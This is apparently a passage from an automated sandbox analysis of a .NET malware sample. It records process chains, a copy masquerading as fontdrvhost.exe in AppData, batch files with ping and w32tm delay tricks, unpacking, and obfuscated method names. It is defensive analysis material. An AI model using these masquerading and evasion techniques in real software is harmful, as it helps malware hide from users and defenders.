                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: ZT3pxe2Tb4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: ZT3pxe2Tb4.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: ZT3pxe2Tb4.exeStatic file information: File size 3672576 > 1048576
                        Source: ZT3pxe2Tb4.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x380200
                        Source: ZT3pxe2Tb4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Detected unpacking (creates a PE file in dynamic memory)
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeUnpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs.Net Code: Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777246)),Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777260))})
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD7964 push ebx; retf 0_2_00007FFD9BBD796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BBB7967 push ebx; retf 8_2_00007FFD9BBB796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9BC4000A push ebx; ret 8_2_00007FFD9BC4007A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 8_2_00007FFD9C0D7498 push ebx; iretd 8_2_00007FFD9C0D756A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA2E94A push edx; retf 9_2_00007FFD9BA2E94B
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA23FBC push eax; retf 9_2_00007FFD9BA23FBD
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 9_2_00007FFD9BA67963 push ebx; retf 9_2_00007FFD9BA6796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 14_2_00007FFD9BBE792B push ebx; retf 14_2_00007FFD9BBE796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA0E94A push edx; retf 21_2_00007FFD9BA0E94B
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA03FBC push eax; retf 21_2_00007FFD9BA03FBD
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BA47963 push ebx; retf 21_2_00007FFD9BA4796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9BC4000A push ebx; ret 21_2_00007FFD9BC4007A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C0F7C2B push E8FFFFFFh; retf 21_2_00007FFD9C0F7C31
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C0D7498 push ebx; iretd 21_2_00007FFD9C0D756A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C116131 push cs; ret 21_2_00007FFD9C11617F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 21_2_00007FFD9C117967 push ebx; retf 21_2_00007FFD9C11796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 27_2_00007FFD9BBC7969 push ebx; retf 27_2_00007FFD9BBC796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 34_2_00007FFD9C0C7498 push ebx; iretd 34_2_00007FFD9C0C756A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA2E94A push edx; retf 35_2_00007FFD9BA2E94B
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA23FBC push eax; retf 35_2_00007FFD9BA23FBD
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BA67963 push ebx; retf 35_2_00007FFD9BA6796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9BBE7228 push E8FFFFFFh; retf 35_2_00007FFD9BBE7231
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C136131 push cs; ret 35_2_00007FFD9C13617F
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C137967 push ebx; retf 35_2_00007FFD9C13796A
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 35_2_00007FFD9C117C27 push E8FFFFFFh; retf 35_2_00007FFD9C117C31
                        Source: ZT3pxe2Tb4.exe, IpUxhliHKcCdFefNH6B.csHigh entropy of concatenated method names: 'M5xiNYhW88', 'krFixFhEKk', 'ujQise37PE', 'XDZ2qnWhUT4o3s6uaQ2C', 'VWnjYnWhvl7OjqSw0nsS', 'WhauFJWhPaBKUerrygMK', 'lRV843WhEgQOlQX6KsYA', 'pqch5qWh5vfdVB6uP9D1', 'UeI9ydWhI6YGaVvZwKlL', 'TlMEauWhQIQeJm4RKeGW'
                        Source: ZT3pxe2Tb4.exe, IvcW8TkzBMKefsOxjFW.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'dbRDWn7vBB', 'RMmDLp8AWE', 'gY2', 'rV4', '_28E'
                        Source: ZT3pxe2Tb4.exe, Qf4khHiUCwcf7y7oGvp.csHigh entropy of concatenated method names: 'LfwiQi4w82', 'bGbuXRWOb87scqdRgwvW', 'M7xMn5WOZ2wIHmhNERHh', 'YLOQwNWOyoC5bgdi10cw', 'iC4GhFWOo5Imjmf1gAfQ', 'Hk5i5w6cjF', 's5OowCWOgq5ARJs5q9v7', 'omd0m7WOeTB3fX7rCK1i', 'VXhkunWOSxFlmfa9i8gD', 'g0LsGZWO1QLv9bnVly7F'
                        Source: ZT3pxe2Tb4.exe, kcK8LC2ejuNjeyVIyjO.csHigh entropy of concatenated method names: 'LkP2O5YDJm', 'GcKaIOW78SAkkpo08bBu', 'giqHAbW76phoaTebjdZA', 'LnvbrgW7HeRFDDiyZw7X', 'yCX2ZKxSG2', 'Vb7IVgW7iQVXxvkFO8K0', 'bbBOEWW7WIej7vsmaBhY', 'qK50M9W7LRubbsxwEQFV', 'EFG3lhW7jaLD9sv6DOFR', 't7Dc5RW7qkn0bNRyGE5v'
                        Source: ZT3pxe2Tb4.exe, VtQKgNTAqnrKagf1yIu.csHigh entropy of concatenated method names: 'n5Kk3EEQl0', 'kgGkWKIgIh', 'G92kLFjHgj', 'qXikiH2y2w', 'H8ikjCF6oJ', 'RUyIZSWrqEP0JkOP09DZ', 'SS9xK3WriE9ikSr3kUDa', 'bGLW0LWrjv6WVntvNZQD', 'UHEbxsWrMUclxO47159y', 'fD2XcRWr2bRXi2tnTcJi'
                        Source: ZT3pxe2Tb4.exe, GLngHO6KQsXpnYd4Osh.csHigh entropy of concatenated method names: 'xrU6rIosOQ', 'c9x3RIWYNJPDR4tQx2DF', 'nJ1cCIWYH7nZfWJuWeth', 'yKJvH6WY8Scg3DGyi3Be', 't4G8rSWYxr6h1EFrkKC4', 'UU8', 'd65', 'gM7WjsqUjnK', 'XGTWjT6Jbxx', 'UP5WFbRhlso'
                        Source: ZT3pxe2Tb4.exe, aR00MCKbKrrQcafHklS.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                        Source: ZT3pxe2Tb4.exe, aaCFBpjrGhL277svCex.csHigh entropy of concatenated method names: 'tnUjvLxJLs', 'GmDwVRWKYR7RwiS5Aiax', 'krM5CkWK7qgJSs2aCjSk', 'TiR06qWKdcSHaP8aUAGm', 'LmWuQhWK09Gg38k3Vjio', 'uhQjmoprTc', 'XI0jnbV2Kn', 'EEujfUyT9R', 'e1ci4VWKKELbu3WC5yxd', 'HVsiKnWKhZMeSG9qP2bK'
                        Source: ZT3pxe2Tb4.exe, u5DC3ZK3VWcZhtg5bex.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                        Source: ZT3pxe2Tb4.exe, c2O1aZjIohIVoPInDqr.csHigh entropy of concatenated method names: 'XHnjJD3uvL', 'gatjAHEgEu', 'kskjzZqh3W', 'cnQYYmWKPa55kXHoYZTH', 'M68xQ6WKEGTxHHw4Y69S', 'QeOUiHWKnnFRpiLrA0m9', 'yf3MZ2WKfQ9uKh7ZBlDe', 'gFojRApOcJ', 'gdbjwM5gQg', 'UQBj4yjfBe'
                        Source: ZT3pxe2Tb4.exe, BDINTO6ucFPcvOZhsbK.csHigh entropy of concatenated method names: '_816', 'd65', 'IH2Wj2eM4Nw', 'OnZWjFWj7mi', 'fxPWF9fBpBq', 'HyrWj32dYif', 'PgI93hWdUSiDA5m6F7aS', 'VfcacVWdvaRvTwGqV8bL', 'Ix0pM3WdPHroHWZOWtl9', 'hcbkOBWdEUuas0x9xtVc'
                        Source: ZT3pxe2Tb4.exe, u0BBE28OSXVKWSIQuO6.csHigh entropy of concatenated method names: 'kwUxBxhXYD', 'CtropMWXEHZbgDXJ8KT6', 'pSgI55WXfnKRqgCaqruG', 'Ifhtj6WXP1fotuIWWkh0', 'AR0kXCWXU6ceFZSFyPwH', 'fks8aatNG6', 'wyp8lv1SWx', 'QEf871OxrT', 'mOP8d1TF6k', 'biu8Y5l9Fl'
                        Source: ZT3pxe2Tb4.exe, wwOJUoHXIrB4EWAbwDr.csHigh entropy of concatenated method names: '_2SY', 'NnyWFYQN31f', 'O8sHrkWZQU', 'EWCWF02WLlY', 'Qtanr4W0ZCd7af5HwyPB', 'VGpVUrW0yHZEGk5PHpUm', 'D4Gx5ZW0eN0OhRCBCrtm', 'AUuMNwW09fyf0By2WA2O', 'igyx8MW0buNuPrflIHYa', 'tKLX1KW0orb9dZicUpiW'
                        Source: ZT3pxe2Tb4.exe, LepXF7saQNmyW35F7qZ.csHigh entropy of concatenated method names: 'j9l', 'bsNs7fxqdV', 'UpnsdRg4Bu', 'UlUsY19HaI', 'TBRs0C9Owv', 'awbsXPD4HT', 'St1sV2cZRK', 'NebRnXWVZ7W9Up753iqP', 'sS0qGqWVe3KYt3qsHZ9j', 'rLw6GTWV9eobHbHQmJMo'
                        Source: ZT3pxe2Tb4.exe, jkQg7ipZplPn1UotyQn.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                        Source: ZT3pxe2Tb4.exe, mFKgY6O0mUDEgBvPdTN.csHigh entropy of concatenated method names: 'YNCOVaFr8s', 'nGLOrBgANR', 'WinOtQUr1p', 'Y2ZOm2E54n', 'dETOnfn2uA', 'LG6r8FWv9gjbhIMJuJyi', 'lN3sB6WvZLMV8BEeLVqj', 'yWZZhYWvghfdpNHRHRdQ', 'zMXvDwWveyguGAOBuaok', 'Ftj3vuWvyIjDpE4rHuYs'
                        Source: ZT3pxe2Tb4.exe, LDmdN86zB9ogB03sCmW.csHigh entropy of concatenated method names: 'tbsHMNecSx', 'MHOq21WYt1QXMQpsvFE5', 'kAhKUUWYVgB4rIxXZ3K2', 'q2wkxJWYrQa11p7T7JDJ', 'VF6UfoWYmpQkr78GmYFE', 'gwX5g8WYn8kUhBDmxBJ4', 'eq7', 'd65', 'PTIWjSrQrDh', 'VhpWj1i8OCN'
                        Source: ZT3pxe2Tb4.exe, w1ZvxosTOM7oO8WXijS.csHigh entropy of concatenated method names: 'GfHsDr0F6n', 'y6lspaa3wB', 't6Fsu2POKC', 'q4Y5sQWVBH6nSK9ZVqNr', 'LXPsu3WVp9cmFccG0h4K', 'iTFsPEWVuXH1Gcx3DuZ3', 'iElKCKWVGAwGbwRpCyVR', 'RmfIvPWVSL4rZo5t6tRM', 'sKFj2hWV1YrM9x8ATgW6'
                        Source: ZT3pxe2Tb4.exe, F8pEmTlg0rSROwdxrKr.csHigh entropy of concatenated method names: 'krr7kqSRvb', 'zcvlkgW5cK0XQpODnT1c', 'Ee2jcUW54H7BoTqoRuUA', 'qDu0xwW5CfA1Li6f3hsk', 'fUUwiuW5JNdNKCW5OWC9', 'i5X', 'GNwl9M7iJb', 'W93', 'L67', '_2PR'
                        Source: ZT3pxe2Tb4.exe, ElFAbjRAp8gHomcv42l.csHigh entropy of concatenated method names: 'RmTwL0WRGB', 'v87wipyKvK', 'JqKh6JWcKYR2EuEHZCsC', 'H4SYsLWchoFJfIpr3lR7', 'g71f0QWcOQ9SdAFuje4c', 'pFXbgtWca4jDDgEKy5YP', 'coORTFWclHUXXbeOGwGi', 'yR2AfaWc7TNEHIFPScxk', 'g4yw3X8UCJ', 'XRTj37WcZUDqyiwCEBJb'
                        Source: ZT3pxe2Tb4.exe, mo13yK5CrYctkp3dlB7.csHigh entropy of concatenated method names: 'TEeINwo7Ns', 'IjmolGW428keDMoo5csY', 'CGvTVAW4F9jVpOYxs3EA', 'd6SeJnW46I9joy3qeXJp', 'GqcaJsW4H4BaBUjCfDpe', 'CPX', 'h7V', 'G6s', '_2r8', 'N28WM7hLb6L'
                        Source: ZT3pxe2Tb4.exe, hMjBriK40KebJGhAYmQ.csHigh entropy of concatenated method names: '_2JN', 'A67', '_49I', 'uqIKcvlyIf', 'asDKJVICv8', 'mgnKAlECkA', 'FVcKzY5Jy1', 'Ouua3esIlb', 'SQdaWwkggl', 'xQRFD3W5GREXLSZOIZ6H'
                        Source: ZT3pxe2Tb4.exe, aTgUygLFeVy5edD89Ae.csHigh entropy of concatenated method names: 'aI6LHxY4MS', 'QnAL8OS6CH', 'pgALNxmOY8', 'q5KaheWotxOjj9xjTqw1', 'TgBq2sWom3T8IULBGgkn', 'v14HX7WonspJilOXqCCB', 'inmaqXWoffLJcyiit785', 'yRtXGqWoPOPGZlkA8AFC', 'f2ohwRWoEjLy0fxB4SlE'
                        Source: ZT3pxe2Tb4.exe, ViYhcOdF6vrUa0t1cjY.csHigh entropy of concatenated method names: 'GYYdHYshg4', '_64r', '_69F', '_478', 'Ffyd84HaLF', '_4D8', 'fDwdNIPwuk', 'MkqdxX6T6O', '_4qr', 'WJNdsyoQFL'
                        Source: ZT3pxe2Tb4.exe, uasKPgqg0wV17QK4luA.csHigh entropy of concatenated method names: 'UBCqdMCWW2', 'M2aqYYZ6kF', 'J1mOQ7Wa1BE7ogk8RAN9', 'KaIno1WaGixdQbC7UNhw', 's9RaCnWaSIi3NZRaqRRN', 'al0uMfWagZbQZ4LeRBcL', 'v43q9V2cac', 'smDqZdRSl1', 'kEaqyFTRnV', 'RNYqbbY9nT'
                        Source: ZT3pxe2Tb4.exe, kybOR8oTmeBISGwfmSh.csHigh entropy of concatenated method names: 'egOoDux0Or', 'SccopGwdZW', 'krgouJCNhT', 'Cm01THWEN9et5W0EMbWS', 'wC0hbqWEHVd3MG51ZTiI', 'x3qIQCWE88FIX3jwhgiC', 'UIgT3lWExribZNZL2cZu', 'wMYIxPWEsLCEVmLE46Vd', 'g4w5jAWET2JcAXx1daDJ', 'm9TtXSWEkIfF8AtiWxXH'
                        Source: ZT3pxe2Tb4.exe, SJGuNI0uH1RArSK0LD5.csHigh entropy of concatenated method names: 'tvQ0Gu2HDM', 'DWi0SXRPmw', 'wyP012niCO', 'Uht0gn3di7', 'iF80eS3wEP', 'W2H09d5swb', 'u7e0ZRanfA', 'mPU0yXQ65L', 'JS80b30dq4', 'nHi0owuppM'
                        Source: ZT3pxe2Tb4.exe, v2CkUEWyx02og5QaT9I.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'j9VWFkFfihW', 'cnqWi5B8Sbb', 'L2hfrCWb4fenqAadb8x1', 'UCnAJUWbC1Bo8UPyofw7', 'SQGhqNWbc7RbZEkl7vvp'
                        Source: ZT3pxe2Tb4.exe, uXVGqXqxAnF7qry6M3R.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'kAiWFSLpZnF', 'TeAWizk87oU', 'MFNEwLWa3ntbDuaRcE2Y', 'gXwdRcWaWheoaVrsZe1g', 'lUHqwEWaL5E5sxGhdPjY', 'gdvgxAWaicZx33EmW40w', 'kNBPQsWajjvO0aLRGnL4'
                        Source: ZT3pxe2Tb4.exe, pm0mP5pLfQBPCqdik4R.csHigh entropy of concatenated method names: 'FQ3pp5nQcg', 'JdapBfSQPW', 'FubpjGYFc2', 'wcipqD7Wya', 'qJxpMulk9A', 'VKdp2WRmuj', 'FYtpFWhwIR', 'urgp6UbXDt', 'ys8pHvSYli', 'bhXp8VvwM7'
                        Source: ZT3pxe2Tb4.exe, Ww4k6dwNg7TTBpNPODA.csHigh entropy of concatenated method names: 'rn3wsZGFM0', 'N9mwT9pv3C', 'n3Xwk2IoRG', 'sfNwD0JPDQ', 'hs2wpduBr0', 'BkRwugdc0A', 'xiZXRLWcnTXtoruJprus', 'D8eQYDWcfLKvl03m7ANI', 'T329SBWcPOgVomlQwrmw', 'FoXjP5WcE9mbaCdGJpUE'
                        Source: ZT3pxe2Tb4.exe, sTBjDmDgGaOZJNJPS2b.csHigh entropy of concatenated method names: 'edgDPTjmqj', 'MPVD9MgGfm', 'ncLDZFjyLG', 'oN7DyxnOWq', 'J7oDb4U7Sm', 'LW1DoYsLM9', 'fKODhZ4DYK', 'Ul2DO4Nq5r', 'wNtDKymRYi', 'HsPDaeJYaG'
                        Source: ZT3pxe2Tb4.exe, uQGZYWjdDiVt8p1pGAa.csHigh entropy of concatenated method names: 'ERVj0SWeTX', 'X2qjXgg0QE', 'JvR5yJWKg1iARcH3A6Ok', 'OyVFe7WKSQZGAqEsjwBV', 'u4Cme1WK1OTKjoBu1wok', 'L0MwxTWKefNQ8cQTdOjU', 'wNADDjWK9WXmdwGPOIqD', 'HHkTJZWKZgxc037kfk8O', 'yYnMi3WKyYKXS0pTAegA', 'DPaMqUWKbMUChsJRBoR1'
                        Source: ZT3pxe2Tb4.exe, nVmYajLBrhsY5QJ9CXJ.csHigh entropy of concatenated method names: 'LvGLSQQX6U', 'PaKL1toIbU', 'uI3KwWWoJfqEmLrqwnNu', 'QRBxs3WoCDysBq72VsCv', 'YGlJx7Wocj7QJPhkscSD', 'vGU7BoWoAZTwO1rPen71', 'vMC1fmWozA5i3uPAJHBu', 'GG1oj9Wh3KeAAwS7K1Qm', 'Sm0qSxWhWJggHTTVLHoF'
                        Source: ZT3pxe2Tb4.exe, fkdgKLhSo1ryjWHpoDM.csHigh entropy of concatenated method names: 'wXphg9r4nS', 'yUQhel6MWT', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'nL7h9gV0SW', '_96S', '_9s5'
                        Source: ZT3pxe2Tb4.exe, K4L4Kuoi6p2AyuhfbCC.csHigh entropy of concatenated method names: 'IWIoqF6bIA', 'G0GoMwB9FM', 'dpUo2GDsea', 'F3UoFLVeme', 'N14o6INJip', 'jAJGRjWPJC25ePw60pFF', 'nHvNjxWPCLp0jfSkeXpu', 'fSlpmNWPc9F03yBkXBNA', 'mMDalmWPAnZgwf7bfl73', 'yYBqwhWPziNyJgCZGJOM'
